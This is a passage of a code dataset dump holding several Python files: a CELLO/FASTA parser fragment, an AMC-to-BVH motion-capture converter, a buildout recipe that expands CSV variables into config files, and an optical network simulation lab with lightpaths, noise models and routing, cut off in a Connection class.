*\n\t\t\t# three white-space-delimited columns, with \"Extracellular\" in the first \n\t\t\t# column, and \"*\" in the third, last column\n\t\t\tcols = line.split()\t\n\t\t\tif len(cols) > 2 and cols[0] == \"Extracellular\" and cols[2] == \"*\":\n\t\t\t\t# Print FASTA records only for those GI's whose CELLO records are \n\t\t\t\t# \"Extracellular\"\n\t\t\t\tSeqIO.write(mice[gi], outfile, \"fasta\")\n","sub_path":"cello-parse.py","file_name":"cello-parse.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"186581622","text":"import glob, os, sys\r\n\r\ndef usuage(scriptName):\r\n print('Usage: %s [src_amc_dir] [dest_bvh_dir]'%scriptName)\r\n\r\ndef makeListFiles(asfFilePaths, amcFilePaths, bvhFilePaths):\r\n list_asf = open('list_asf.txt', 'w')\r\n list_amc = open('list_amc.txt', 'w')\r\n list_bvh = open('list_bvh.txt', 'w')\r\n \r\n for path in asfFilePaths:\r\n list_asf.write(path+'\\n')\r\n for path in amcFilePaths:\r\n list_amc.write(path+'\\n')\r\n for path in bvhFilePaths:\r\n list_bvh.write(path+'\\n')\r\n \r\n list_asf.close()\r\n list_amc.close()\r\n list_bvh.close()\r\n \r\ndef removeListFiles():\r\n os.remove('list_asf.txt')\r\n os.remove('list_amc.txt')\r\n os.remove('list_bvh.txt')\r\n \r\ndef readBvhJointNames(bvhFilePath):\r\n jointNames = []\r\n f = open(bvhFilePath)\r\n for line in f:\r\n tokens = line.split()\r\n if tokens[0] == 'ROOT' or tokens[0] == 'JOINT':\r\n jointNames.append(tokens[1])\r\n if tokens[0] == 'MOTION':\r\n break\r\n return jointNames\r\n \r\ndef readAsfBoneNames(asfFilePath):\r\n boneNames = []\r\n f = open(asfFilePath)\r\n for line in f:\r\n tokens = line.split()\r\n if tokens[0] == 'name':\r\n boneNames.append(tokens[1])\r\n return boneNames \r\n \r\ndef getDefaultChangeMap(asfBoneNames):\r\n changeMap = {}\r\n for boneNames in asfBoneNames:\r\n changeMap[boneNames.lower()] = boneNames\r\n return changeMap\r\n\r\n# changeMap[oldJointName] = newJointName\r\ndef changeBvhJointNamesInFile(bvhFilePath, changeMap):\r\n f = open(bvhFilePath, 'r')\r\n oldLines = f.readlines()\r\n f.close()\r\n \r\n newLines = [None]*len(oldLines)\r\n for i in range(len(oldLines)):\r\n oldLine = oldLines[i]\r\n tokens = oldLine.split()\r\n if tokens[0] == 'ROOT' or tokens[0] == 'JOINT':\r\n oldJointName = tokens[1]\r\n if oldJointName in changeMap:\r\n newJointName = changeMap[oldJointName]\r\n newLine = oldLine.replace(oldJointName, newJointName)\r\n newLines[i] = newLine\r\n else:\r\n newLines[i] = oldLine\r\n else:\r\n newLines[i] = oldLine\r\n\r\n f = open(bvhFilePath, 'w')\r\n f.writelines(newLines)\r\n f.close()\r\n\r\ndef convertAmc2Bvh(amcDir, bvhDir):\r\n asfFilePath = glob.glob(amcDir+'/*.asf')[0]\r\n print('asf:', asfFilePath)\r\n print()\r\n \r\n amcFilePaths = glob.glob(amcDir+'/*.amc')\r\n bvhFilePaths = []\r\n asfFilePaths = [] \r\n \r\n print('amc:')\r\n for i in range(len(amcFilePaths)):\r\n amcPath = amcFilePaths[i]\r\n print('[%d] %s'%(i, amcPath))\r\n \r\n amcFileName = os.path.basename(amcPath)\r\n fileName = os.path.splitext(amcFileName)[0]\r\n \r\n bvhFileName = fileName + '.bvh'\r\n bvhFilePath = bvhDir + '/' + bvhFileName\r\n bvhFilePaths.append(bvhFilePath)\r\n \r\n asfFilePaths.append(asfFilePath)\r\n print()\r\n \r\n makeListFiles(asfFilePaths, amcFilePaths, bvhFilePaths)\r\n os.system('Amc2Bvh.exe')\r\n removeListFiles()\r\n \r\n changeMap = getDefaultChangeMap(readAsfBoneNames(asfFilePath))\r\n changeMap['hip'] = 'Hips'\r\n changeMap['head'] = 'Head'\r\n \r\n print('bvh:')\r\n for i in range(len(amcFilePaths)):\r\n bvhPath = bvhFilePaths[i] \r\n changeBvhJointNamesInFile(bvhPath, changeMap)\r\n print('[%d] %s'%(i, bvhPath))\r\n print()\r\n \r\n print('Done')\r\n\r\n\r\nif __name__ == '__main__':\r\n if len(sys.argv) > 3:\r\n usuage(os.path.basename(sys.argv[0]))\r\n else:\r\n if len(sys.argv) == 1:\r\n srcDir = '.'\r\n destDir = srcDir\r\n elif len(sys.argv) == 2:\r\n srcDir = sys.argv[1]\r\n destDir = srcDir\r\n elif len(sys.argv) == 3:\r\n srcDir = sys.argv[1]\r\n destDir = sys.argv[2]\r\n \r\n convertAmc2Bvh(srcDir, destDir)\r\n","sub_path":"PyCommon/modules/Tools/Amc2BvhEx.py","file_name":"Amc2BvhEx.py","file_ext":"py","file_size_in_byte":3891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"406080636","text":"# -*- coding: utf-8 -*-\n\"\"\"Recipe csvconfig\"\"\"\nimport re\nimport csv\nimport os.path\nimport zc.buildout.buildout\nimport pprint\nfrom zc.buildout.buildout import Options\nimport configparser\nimport logging\n \n \n\n\n\nclass Recipe(object):\n \"\"\"zc.buildout recipe\"\"\"\n def read_csvconfig(self,file):\n aReader = csv.reader(open(file))\n for index,row in enumerate(aReader):\n #print ' : '.join(row)\n if index == 0: #first row holds the variable names\n for var in row:\n self.vars.append(var.strip())\n continue\n d = {}\n for i, var in enumerate(row):\n d[self.vars[i]] = var.strip()\n self.lines.append(d)\n\n def multikeydict(self,keys, lines):\n \"\"\"generate a dict with 'keys' (list of variables names) as index key\n the value part of this dict is a list of dict that holds the values for\n the different columns\"\"\"\n newdict = {}\n\n for line in lines:\n newkey_value = []\n newkey = ''\n for key in keys:\n newkey_value.append(line[key])\n newkey_value.sort()\n newkey = ','.join(newkey_value)\n if newkey:\n if newkey not in newdict.keys():\n newdict[newkey] = []\n newdict[newkey].append(line)\n return newdict\n \n \n def checkkey(self,word):\n \"\"\"check either on the left part of an option or on a section if there is, or are\n keys => returns a list of keys or an empty list if nothing\"\"\"\n match = self.c_re.search(word)\n i = 0\n keylist = []\n while match:\n #print match.group()\n #import pdb; pdb.set_trace()\n var = match.group(1)\n to_replace = match.group(0)\n length = len(to_replace) + 1\n #import pdb; pdb.set_trace()\n if var in self.vars:\n keylist.append(var)\n i = match.pos + length\n match = self.c_re.search(word, i)\n #print \"checkkey : \", keylist\n return keylist\n \n\n def expandvar(self, word, line):\n \"\"\"expand variables if found in vars according to dict 'line'\n returns word with var subsitution when possible\n rule is that if there's a variable in word and line as an empty result\n for this variable, then the returned word is set to ''\n the same is true if for all variable of a word line provides an empty result\n \"\"\"\n match = self.c_re.search(word)\n i = 0\n nbmatch = 0\n empty = 0\n original = word[:]\n while True:\n if not match:\n break\n nbmatch += 1\n var = match.group(1)\n to_replace = match.group(0)\n length = len(to_replace) + 1\n #import pdb; pdb.set_trace()\n if var in self.vars:\n if line[var] == '':\n empty += 1\n word = word.replace(to_replace,line[var])\n length = len(line[var]) + 1\n i = match.pos + length\n match = self.c_re.search(word, i)\n #print \"expandvar : \", word, self.vars\n if nbmatch and nbmatch == empty:\n #import pdb; pdb.set_trace()\n return ''\n return word\n\n \n def expandsection(self,section,config,buildout,keylist,dictlist):\n \"\"\"expand section with variables\"\"\"\n newsection = self.expandvar(section,dictlist[0])\n if not buildout.has_section(newsection):\n buildout.add_section(newsection)\n for option in config.options(section):\n #import pdb; pdb.set_trace()\n opt = config.get(section, option)\n match = self.c_re.search(option)\n if match: #option name contains a variable\n newkeys = self.checkkey(option)\n keydict = self.multikeydict(newkeys,dictlist)\n for key in keydict.keys():\n buildout = self.expandoption(option,opt,newsection,buildout,keydict[key])\n else:#eventually right-part contains a variable\n buildout = self.expandoption(option,opt,newsection,buildout,dictlist)\n return buildout\n \n def expandoption(self,option,optionvalue,section,buildout,dictlist):\n \"\"\"expand section with variables\"\"\"\n newoption = self.expandvar(option,dictlist[0])\n if not buildout.has_section(section):\n buildout.add_section(section)\n newopts = []\n for line in dictlist:\n #import pdb; pdb.set_trace()\n newopt = self.expandvar(optionvalue, line)\n if newopt not in newopts:\n newopts.append(newopt)\n newoptionvalue = '\\n\\t'.join(newopts)\n buildout.set(section, newoption, newoptionvalue)\n return buildout\n \n\n def expandall_on_section(self, config, buildout, section):\n \"\"\"apply all vars on a section\"\"\"\n # first expand section name if necessary\n match = self.c_re.search(section)\n if match:\n newkeys = self.checkkey(section)\n keydict = self.multikeydict(newkeys,self.lines)\n #import pdb; pdb.set_trace()\n for key in keydict.keys():\n buildout = self.expandsection(section,config,buildout,key,keydict[key])\n \n else:\n buildout = self.expandsection(section,config,buildout,self.vars,self.lines)\n return buildout \n\n def apply_variables(self,template,target):\n \"\"\" apply variables in template and save it as new config file in target\n \"\"\"\n \n config = configparser.ConfigParser(delimiters=('=', '+=', '-='))\n newconfig = configparser.ConfigParser(delimiters=('=', '+=', '-='))\n config.read(template)\n #import pdb; pdb.set_trace()\n # first read sections to find variables in vars\n # newconfig.sections = dict(config.sections)\n #import pdb; pdb.set_trace()\n for sect in config.sections():\n newconfig = self.expandall_on_section(config, newconfig, sect)\n #import pdb; pdb.set_trace()\n with open(target, 'wb+') as configfile:\n newconfig.write(configfile) \n \n\n def __init__(self, buildout, name, options):\n self.buildout, self.name, self.options = buildout, name, options\n self.csvfile = self.options.pop('csvfile', name).strip().split()\n self.templates = self.options.pop('templates', name).strip().split()\n self.lines = [] \n self.vars = []\n self.c_re = re.compile(r'\\$\\$\\{([^:|}]*)\\}')\n #self.c_re = re.compile(r'\\$\\${(.*?)}')\n \n #template name may come under the form \"filepath:target\" both being relative path from \n #buildout-dir\n #if no \":\" is found default target applied is buildout-dir with same filename as template\n # minus the \".in\" extension\n def parse_template(self,template):\n if ':' in template:\n template, target = template.split(':')\n target = os.path.join(\n self.buildout['buildout']['directory'],\n target,\n )\n\n else:\n target = template.split('/')[-1][0:-3]\n return template.strip(), target.strip()\n\n\n\n def install(self):\n \"\"\"Installer\"\"\"\n # XXX Implement recipe functionality here\n\n # Return files that were created by the recipe. The buildout\n # will remove all returned files upon reinstall.\n ret = []\n new_sections = []\n for file in self.csvfile:\n self.read_csvconfig(file)\n for template, target in (self.parse_template(template) for template in self.templates):\n self.apply_variables(template,target)\n logging.getLogger(self.name).info(\n 'Creating config file : %s', target)\n ret.append(target)\n return tuple(ret)\n\n def update(self):\n \"\"\"Updater\"\"\"\n return self.install()\n","sub_path":"build/lib/ageliaco/recipe/csvconfig/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"209680816","text":"import itertools\nimport json\nimport matplotlib\nfrom scipy import special as math\nimport random\n\nimport numpy as np\nimport pandas as pd\n\nmatplotlib.use('TkAgg') # comment\nimport matplotlib.pyplot as plt\n\nfrom scipy.constants import c, h, pi\nfrom random import shuffle\n\nBER_t = 1e-3\nBn = 12.5e9 # banda rumore\n\n\nclass Lightpath(object): # Lab5 definita nuova classe\n def __init__(self, power, path, channel):\n self._sig_power = power\n self._path = path\n self._channel = channel\n self._noise_power = 0\n self._latency = 0\n self.Rs = 32.0e9 # Lab8\n self.df = 50.0e9\n\n @property\n def signal_power(self):\n return self._sig_power\n\n def set_signal_power(self, value):\n self._sig_power = value\n\n @property\n def path(self):\n return self._path\n\n @path.setter\n def path(self, value):\n self._path = value\n\n @property\n def channel(self):\n return self._channel\n\n @property\n def noise_power(self):\n return self._noise_power\n\n @noise_power.setter\n def noise_power(self, value):\n self._noise_power = value\n\n @property\n def latency(self):\n return self._latency\n\n @latency.setter\n def latency(self, value):\n self._latency = value\n\n def add_noise(self, value):\n self.noise_power += value\n\n def add_latency(self, value):\n self.latency += value\n\n def next(self):\n self.path = self.path[1:]\n\n\nclass SignalInformation(Lightpath):\n def __init__(self, power, path):\n # super().__init__(power, path, 0)\n self._signal_power = power\n self._path = path\n self._noise_power = 0\n self._latency = 0\n self.Rs = 32.0e9 # Lab8\n self.df = 50.0e9\n\n @property\n def signal_power(self):\n return self._signal_power\n\n @property\n def path(self):\n return self._path\n\n @path.setter\n def path(self, path):\n self._path = path\n\n @property\n def noise_power(self):\n return self._noise_power\n\n @noise_power.setter\n def noise_power(self, noise):\n self._noise_power = noise\n\n @property\n def latency(self):\n return self._latency\n\n @latency.setter\n def latency(self, latency):\n self._latency = latency\n\n def add_noise(self, noise):\n self._noise_power += noise\n\n def add_latency(self, latency):\n self._latency += latency\n\n def next(self):\n self.path = self.path[1:]\n\n\n################################### CLASS LINE ###########################################\n\nclass Line(object):\n\n def __init__(self, line_dict):\n self._label = line_dict['label']\n self._lenght = line_dict['lenght']\n self._state = ['free'] * 10 # Lab5 trasformato il campo in vettore\n self._successive = {} # Node\n self._n_amplifiers = int((self._lenght / 80e3)) # added the successives 3 parameters\n self._gain = 16\n self._noise_figure = 3\n\n # Pysical parameters of the fiber\n # Added from 3rd point lab8\n self._alpha = 0.2e-3\n self._beta = 2.13e-26\n self._gamma = 1.27e-3\n self._rs = 32e9\n self._df = 50e9\n\n @property\n def label(self):\n return self._label\n\n @property\n def lenght(self):\n return self._lenght\n\n @property # Lab4\n def state(self):\n return self._state\n\n @state.setter\n def state(self, state):\n # state = state.lower().strip()\n state = [s.lower().strip() for s in state] # aggiunta in Lab5\n # if state in ['free', 'occupied']:vecchia condizione\n if set(state).issubset(set(['free', 'occupied'])): # Modifica Lab5, dovuto da aggiornamento a vettore\n self._state = state\n else:\n print('ERROR: line state not recognized.Value:', set(state) - set(['free', 'occupied'])) # aggiunta a Lab5\n # print('ERROR: line state not recognized.Value:', state) vecchia condizione\n\n @property\n def successive(self):\n return self._successive\n\n @successive.setter\n def successive(self, successive):\n self._successive = successive\n\n def latency_generation(self):\n latency = self._lenght / (c * 2 / 3)\n return latency\n\n # def noise_generation(self, signal_power): Old method\n # noise = signal_power / (2 * self._lenght)\n # return noise\n\n def noise_generation(self, lightpath): # Lab9 method\n # noise = 0.000000001 * signal_power * self._length # 1e-9 * s_p * length\n noise = self.ase_generation() + self.nli_generation(lightpath.signal_power, lightpath.df, lightpath.Rs)\n return noise\n\n @property\n def n_amplifiers(self):\n return self._n_amplifiers\n\n @property\n def span_length(self):\n return self._span_length\n\n @property\n def gain(self):\n return self._gain\n\n @gain.setter\n def gain(self, gain):\n self._gain = gain\n\n @property\n def noise_figure(self):\n return self._noise_figure\n\n @property\n def alpha(self):\n return self._alpha\n\n @property\n def beta(self):\n return self._beta\n\n @property\n def gamma(self):\n return self._gamma\n\n @property\n def rs(self):\n return self._rs\n\n @property\n def df(self):\n return self._df\n\n def free_state(self): # Lab9\n self._state = ['free'] * 10\n\n def propagate(self, lightpath, occupation=False): # sostituito SignalInformation con Lightpath Lab5\n # latency\n latency = self.latency_generation()\n lightpath.add_latency(latency)\n\n # noise old method\n # signal_power = lightpath.signal_power\n sp = self.optimized_launch_power(self.eta_nli(lightpath.df, lightpath.Rs)) # Lab9 adjust\n lightpath.set_signal_power(sp) # same as up\n noise = self.noise_generation(lightpath)\n lightpath.add_noise(noise)\n\n # state\n if occupation: # Condizione aggiornata da Lab5\n channel = lightpath.channel\n new_state = list(self.state)\n new_state[channel] = 'occupied'\n self.state = new_state\n\n node = self.successive[lightpath.path[0]]\n lightpath = node.propagate(lightpath, occupation)\n return lightpath\n\n def ase_generation(self):\n gain_lin = 10 ** (self._gain / 10)\n noise_figure_lin = 10 ** (self._noise_figure / 10)\n N = self._n_amplifiers\n f = 193.4e12\n # h = Planck\n Bn = 12.5e9\n ase_noise = N * h * f * Bn * noise_figure_lin * (gain_lin - 1)\n return ase_noise\n\n # last point of lab8\n # all clear until now\n def nli_generation(self, signal_power, dfp, Rsp):\n Bn = 12.5e9 # GHz\n eta_nli = self.eta_nli(dfp, Rsp)\n nli = (signal_power ** 3) * eta_nli * self._n_amplifiers * Bn\n return nli\n\n # need to find this formula\n def eta_nli(self, dfp, Rsp):\n df = dfp\n Rs = Rsp\n a = self.alpha / (20 * np.log10(np.e))\n Nch = 10\n b2 = self.beta\n e_nli = 16 / (27 * np.pi) * np.log(\n np.pi ** 2 * b2 * Rs ** 2 * Nch ** (2 * Rs / df) / (2 * a)) * self.gamma ** 2 / (\n 4 * a * b2 * Rs ** 3)\n\n return e_nli\n\n def optimized_launch_power(self, eta): # Lab9 2nd point\n F = 10 ** (self.noise_figure / 10)\n G = 10 ** (self.gain / 10)\n f0 = 193.414e12\n olp = ((F * f0 * h * G) / (2 * eta)) ** (1 / 3)\n return olp\n\n\n#################################### CLASS NODE ###############################################\n\nclass Node(object):\n def __init__(self, node_dict):\n self._label = node_dict['label']\n self._position = node_dict['position']\n self._connected_nodes = node_dict['connected_nodes']\n self._successive = {}\n self._switching_matrix = None # Lab6 added attribute property and setter\n self._transceiver = '' # Lab7 es 2\n\n @property\n def label(self):\n return self._label\n\n @property\n def position(self):\n return self._position\n\n @property\n def connected_nodes(self):\n return self._connected_nodes\n\n @property\n def successive(self):\n return self._successive\n\n @successive.setter\n def successive(self, successive):\n self._successive = successive\n\n @property\n def switching_matrix(self):\n return self._switching_matrix\n\n @switching_matrix.setter\n def switching_matrix(self, value):\n self._switching_matrix = value\n\n @property\n def transceiver(self):\n return self._transceiver\n\n @transceiver.setter\n def transceiver(self, transceiver):\n self._transceiver = transceiver\n\n def propagate(self, lightpath, occupation=False):\n path = lightpath.path\n if len(path) > 1:\n line_label = path[:2]\n line = self.successive[line_label]\n lightpath.next()\n lightpath = line.propagate(lightpath, occupation) # Lab5 aggiornato lightpath al posto di signalinformation\n\n return lightpath\n\n\n######################## CLASS NETWORK ###########################################\n\nclass Network(object):\n def __init__(self, json_path, transceiver='fixed_rate'):\n self._nodes = {}\n self._lines = {}\n self._connected = False # Lab4\n self._weighted_paths = None # Lab4\n self._route_space = None # Lab5\n\n node_json = json.load(open(json_path, 'r'))\n for node_label in node_json:\n # create nodes\n node_dict = node_json[node_label]\n node_dict['label'] = node_label\n node = Node(node_dict)\n self._nodes[node_label] = node\n\n # Lab 7\n if 'transceiver' not in node_json[node_label].keys():\n node.transceiver = transceiver\n else:\n node.transceiver = node_json[node_label]['transceiver']\n\n # create lines\n for connected_node_label in node_dict['connected_nodes']:\n line_dict = {}\n line_label = node_label + connected_node_label\n line_dict['label'] = line_label\n node_position = np.array(node_json[node_label]['position'])\n connected_node_position = np.array(node_json[connected_node_label]['position'])\n line_dict['lenght'] = np.sqrt(np.sum(node_position - connected_node_position) ** 2)\n line = Line(line_dict)\n self._lines[line_label] = line\n\n @property\n def nodes(self):\n return self._nodes\n\n @property\n def lines(self):\n return self._lines\n\n @property\n def connected(self):\n return self._connected\n\n def draw(self):\n nodes = self.nodes\n for node_label in nodes:\n n0 = nodes[node_label]\n x0 = n0.position[0] / 1e3\n y0 = n0.position[1] / 1e3\n plt.plot(x0, y0, 'go', markersize=10)\n plt.text(x0, y0, node_label)\n for connected_node_label in n0.connected_nodes:\n n1 = nodes[connected_node_label]\n x1 = n1.position[0] / 1e3\n y1 = n1.position[1] / 1e3\n plt.plot([x0, x1], [y0, y1], 'b')\n plt.xlabel('Km')\n plt.title('Network')\n plt.show()\n\n def find_paths(self, label1, label2):\n cross_nodes = [key for key in self.nodes.keys() if ((key != label1) & (key != label2))]\n cross_lines = self.lines.keys()\n inner_paths = {}\n inner_paths['0'] = label1\n for i in range(len(cross_nodes) + 1):\n inner_paths[str(i + 1)] = []\n for inner_path in inner_paths[str(i)]:\n inner_paths[str(i + 1)] += [\n inner_path + cross_node\n for cross_node in cross_nodes\n if ((inner_path[-1] + cross_node in cross_lines) &\n (cross_node not in inner_path))]\n\n paths = []\n for i in range(len(cross_nodes) + 1):\n for path in inner_paths[str(i)]:\n if path[-1] + label2 in cross_lines:\n paths.append(path + label2)\n return paths\n\n # Lab9: da rivedere\n\n def free_space(self):\n states = ['free'] * len(self.route_space['path'])\n for l in self.lines.values():\n l.free_state()\n for i in range(10):\n self.route_space[str(i)] = states\n\n def connect(self): # Added switching matrix reference Lab6\n nodes_dict = self.nodes\n lines_dict = self.lines\n switching_matrix = {}\n for node_label in nodes_dict:\n node = nodes_dict[node_label]\n for connected_node in node.connected_nodes:\n inner_dict = {connected_node: np.zeros(10)}\n for connected_node2 in node.connected_nodes:\n if connected_node2 != connected_node:\n dict_tmp = {connected_node2: np.ones(10)}\n inner_dict.update(dict_tmp)\n\n switching_matrix.update({connected_node: inner_dict})\n\n line_label = node.label + connected_node\n line = lines_dict[line_label]\n line.successive[connected_node] = nodes_dict[connected_node]\n node.successive[line_label] = lines_dict[line_label]\n node.switching_matrix = switching_matrix\n switching_matrix = {}\n self._connected = True\n\n # def propagate(self,signal_information): #funzione prima di Lab5\n # path=signal_information.path\n # start_node=self.nodes[path[0]]\n # propagated_signal_information=start_node.propagate(signal_information)\n # return propagated_signal_information\n\n def propagate(self, lightpath, occupation=False): # Aggiornata a Lab5\n path = lightpath.path\n start_node = self.nodes[path[0]]\n propagated_lightpath = start_node.propagate(lightpath, occupation)\n return propagated_lightpath\n\n # Lab4\n @property\n def weighted_paths(self):\n return self._weighted_paths\n\n def set_weighted_paths(self, signal_power): # Modifica Lab5 con implementazione route space\n if not self.connected:\n self.connect()\n node_labels = self.nodes.keys()\n pairs = []\n for label1 in node_labels:\n for label2 in node_labels:\n if label1 != label2:\n pairs.append(label1 + label2)\n df = pd.DataFrame()\n paths = []\n latencies = []\n noises = []\n snrs = []\n\n for pair in pairs:\n for path in self.find_paths(pair[0], pair[1]):\n path_string = ''\n for node in path:\n path_string += node + '->'\n paths.append(path_string[:-2])\n\n # Propagation\n signal_information = SignalInformation(signal_power, path)\n if pair in self.lines.keys():\n line = self.lines[pair]\n signal_power = line.optimized_launch_power(\n line.eta_nli(signal_information.df, signal_information.Rs))\n signal_information.set_signal_power(signal_power)\n\n signal_information = self.propagate(signal_information, occupation=False)\n latencies.append(signal_information.latency)\n noises.append(signal_information.noise_power)\n snrs.append(10 * np.log10(signal_information.signal_power / signal_information.noise_power))\n\n df['path'] = paths\n df['latency'] = latencies\n df['noise'] = noises\n df['snr'] = snrs\n self._weighted_paths = df\n # Aggiunta da Lab5\n route_space = pd.DataFrame()\n route_space['path'] = paths\n for i in range(10):\n route_space[str(i)] = ['free'] * len(paths)\n self._route_space = route_space\n\n # Lab3 --ridefinita in Lab4 sotto\n # def find_best_latency(self, input_node, output_node):\n # all_paths = self.weighted_paths.path.values\n # inout_paths = [path for path in all_paths if ((path[0] == input_node) and (path[-1] == output_node))]\n # inout_df = self.weighted_paths.loc[\n # self.weighted_paths.path.isin(inout_paths)]\n # best_latency = np.min(inout_df.latency.values)\n # best_path = inout_df.loc[\n # inout_df.latency == best_latency].path.values[0].replace('->', '')\n # return best_path\n\n def stream(self, connections, best='latency'): # Aggiornato a Lab7\n streamed_connections = []\n for connection in connections:\n input_node = connection.input_node\n output_node = connection.output_node\n signal_power = connection.signal_power\n # self.set_weighted_paths(signal_power) Lab3\n self.set_weighted_paths(1) # Lab4\n if best == 'latency':\n path = self.find_best_latency(input_node, output_node)\n elif best == 'snr':\n path = self.find_best_snr(input_node, output_node)\n else:\n print('ERROR: best input not recognized.Value:', best)\n continue\n # if path: #added condition for Lab4 on the path\n # in_signal_information = SignalInformation(signal_power, path)\n # out_signal_information = self.propagate(in_signal_information)\n # connection.latency = out_signal_information.latency\n # noise = out_signal_information.noise_power\n # connection.snr = 10 * np.log10(signal_power / noise)\n if path: # Condiione aggiornata a Lab5\n path_occupancy = self.route_space.loc[self.route_space.path == path].T.values[1:]\n channel = [i for i in range(len(path_occupancy)) if path_occupancy[i] == 'free'][0]\n # Lab 7 es 3\n lightpath = Lightpath(signal_power, path, channel)\n rb = self.calculate_bit_rate(lightpath, self.nodes[input_node].transceiver)\n if rb == 0:\n continue\n else:\n connection.bit_rate = rb\n # end\n path_occupancy = self.route_space.loc[\n self.route_space.path == path].T.values[1:]\n channel = [i for i in range(len(path_occupancy))\n if path_occupancy[i] == 'free'][0]\n path = path.replace('->', '')\n in_lightpath = Lightpath(signal_power, path, channel)\n out_lightpath = self.propagate(in_lightpath, True)\n connection.latency = out_lightpath.latency\n noise_power = out_lightpath.noise_power\n connection.snr = 10 * np.log10(signal_power / noise_power)\n self.update_route_space(path, channel)\n else:\n connection.snr = 0\n connection.latency = 'None'\n streamed_connections.append(connection)\n return streamed_connections\n\n # due metodi aggiunti (lab5)\n @staticmethod\n def path_to_line_set(path):\n path = path.replace('->', '')\n return set([path[i] + path[i + 1] for i in range(len(path) - 1)])\n\n def update_route_space(self, path,\n channel): # Modifica da Lab6 per aggiornare la routing space con la switching matrix\n all_paths = [self.path_to_line_set(p) for p in self.route_space.path.values]\n states = self.route_space[str(channel)]\n lines = self.path_to_line_set(path)\n for i in range(len(all_paths)):\n line_set = all_paths[i]\n if lines.intersection(line_set):\n states[i] = 'occupied'\n\n path_to_update = self.line_set_to_path(line_set)\n\n for j in range(len(path_to_update)): # strange\n if j not in (0, len(path_to_update) - 1):\n if ((path_to_update[j - 1] in self.nodes[path_to_update[j]].connected_nodes) & (\n path_to_update[j + 1] in self.nodes[path_to_update[j]].connected_nodes)):\n self.nodes[path_to_update[j]].switching_matrix[path_to_update[j - 1]][\n path_to_update[j + 1]][\n channel] = 0\n self.route_space[str(channel)] = states\n\n # metodo per ottenere tutte le liste di stati dalle linee\n @staticmethod # how tf is this working i've really have no idea\n def line_set_to_path(line_set):\n path = \"\"\n elements = list(itertools.permutations(list(line_set), len(list(line_set))))\n for i in range(len(elements)):\n flag = 1\n for j in range(len(elements[i]) - 1):\n if elements[i][j][1] != elements[i][j + 1][0]:\n flag = 0\n j += 2\n if flag == 1:\n for j in range(len(elements[i])):\n path += elements[i][j][0]\n return path\n\n # es7 Lab4\n # Modifica Lab5 es4 in modo da gestire la channel occupancy (tutti e tre i metodi)\n\n # def available_paths(self, input_node, output_node): #Funzione da Lab4\n # if self.weighted_paths is None:\n # self.set_weighted_paths(1)\n # all_paths = [path for path in self.weighted_paths.path.values\n # if ((path[0] == input_node) and (path[-1] == output_node))]\n # unavailable_lines = [line for line in self.lines\n # if self.lines[line].state =='occupied']\n # available_paths = []\n # for path in all_paths:\n # available = True\n # for line in unavailable_lines:\n # if line[0] + '->' + line[1] in path:\n # available = False\n # break\n # if available:\n # available_paths.append(path)\n # return available_paths\n\n def available_paths(self, input_node, output_node): # Funione ridefinita in contesto a Lab5\n if self.weighted_paths is None:\n self.set_weighted_paths(1e-3)\n all_paths = [path for path in self.weighted_paths.path.values\n if ((path[0] == input_node) and (path[-1] == output_node))]\n available_paths = []\n for path in all_paths:\n path_occupancy = self.route_space.loc[self.route_space.path == path].T.values[1:]\n if 'free' in path_occupancy:\n available_paths.append(path)\n return available_paths\n\n def find_best_snr(self, input_node, output_node):\n available_paths = self.available_paths(input_node, output_node)\n if available_paths:\n inout_df = self.weighted_paths.loc[self.weighted_paths.path.isin(available_paths)]\n best_snr = np.max(inout_df.snr.values)\n # best_path = inout_df.loc[inout_df.snr == best_snr].path.values[0].replace('->', '')\n best_path = inout_df.loc[inout_df.snr == best_snr].path.values[0] # da Lab5\n else:\n best_path = None\n return best_path\n\n def find_best_latency(self, input_node, output_node):\n available_paths = self.available_paths(input_node, output_node)\n if available_paths:\n inout_df = self.weighted_paths.loc[self.weighted_paths.path.isin(available_paths)]\n best_latency = np.min(inout_df.latency.values)\n # best_path = inout_df.loc[inout_df.latency == best_latency].path.values[0].replace('->', '')\n best_path = inout_df.loc[inout_df.latency == best_latency].path.values[0] # da Lab5\n else:\n best_path = None\n return best_path\n\n # Lab5\n @property\n def route_space(self):\n return self._route_space\n\n # Lab7\n def calculate_bit_rate(self, lightpath, strategy):\n global BER_t\n Rs = lightpath.Rs\n global Bn\n path = lightpath.path\n Rb = 0\n GSNR_db = pd.array(self.weighted_paths.loc[self.weighted_paths['path'] == path]['snr'])[0]\n GSNR = 10 ** (GSNR_db / 10)\n\n if strategy == 'fixed_rate':\n if GSNR > 2 * math.erfcinv(2 * BER_t) ** 2 * (Rs / Bn):\n Rb = 100\n else:\n Rb = 0\n\n if strategy == 'flex_rate':\n if GSNR < 2 * math.erfcinv(2 * BER_t) ** 2 * (Rs / Bn):\n Rb = 0\n elif (GSNR > 2 * math.erfcinv(2 * BER_t) ** 2 * (Rs / Bn)) & (GSNR < (14 / 3) * math.erfcinv(\n (3 / 2) * BER_t) ** 2 * (Rs / Bn)):\n Rb = 100\n elif (GSNR > (14 / 3) * math.erfcinv((3 / 2) * BER_t) ** 2 * (Rs / Bn)) & (GSNR < 10 * math.erfcinv(\n (8 / 3) * BER_t) ** 2 * (Rs / Bn)):\n Rb = 200\n elif GSNR > 10 * math.erfcinv((8 / 3) * BER_t) ** 2 * (Rs / Bn):\n Rb = 400\n\n if strategy == 'shannon':\n Rb = 2 * Rs * np.log2(1 + Bn / Rs * GSNR) / 1e9\n\n return Rb\n\n # Lab9: added functions to update the traffic matrix\n\n def node_to_number(self, str):\n nodes = list(self.nodes.keys())\n nodes.sort()\n return nodes.index(str)\n\n def upgrade_traffic_matrix(self, mtx, nodeA, nodeB):\n A = self.node_to_number(nodeA)\n B = self.node_to_number(nodeB)\n connection = Connection(nodeA, nodeB, 1e-3)\n list_con = [connection]\n self.stream(list_con)\n btr = connection.bit_rate\n if btr == 0:\n mtx[A][B] = float('inf')\n return float('inf')\n mtx[A][B] -= btr\n return mtx[A][B]\n\n\n############################# CLASS CONNECTIONS ######################################\n\nclass Connection(object):\n def __init__(self, input_node, output_node, signal_power):\n self._input_node = input_node\n self._output_node = output_node\n self._signal_power = signal_power\n self._latency = 0\n self._snr = 0\n 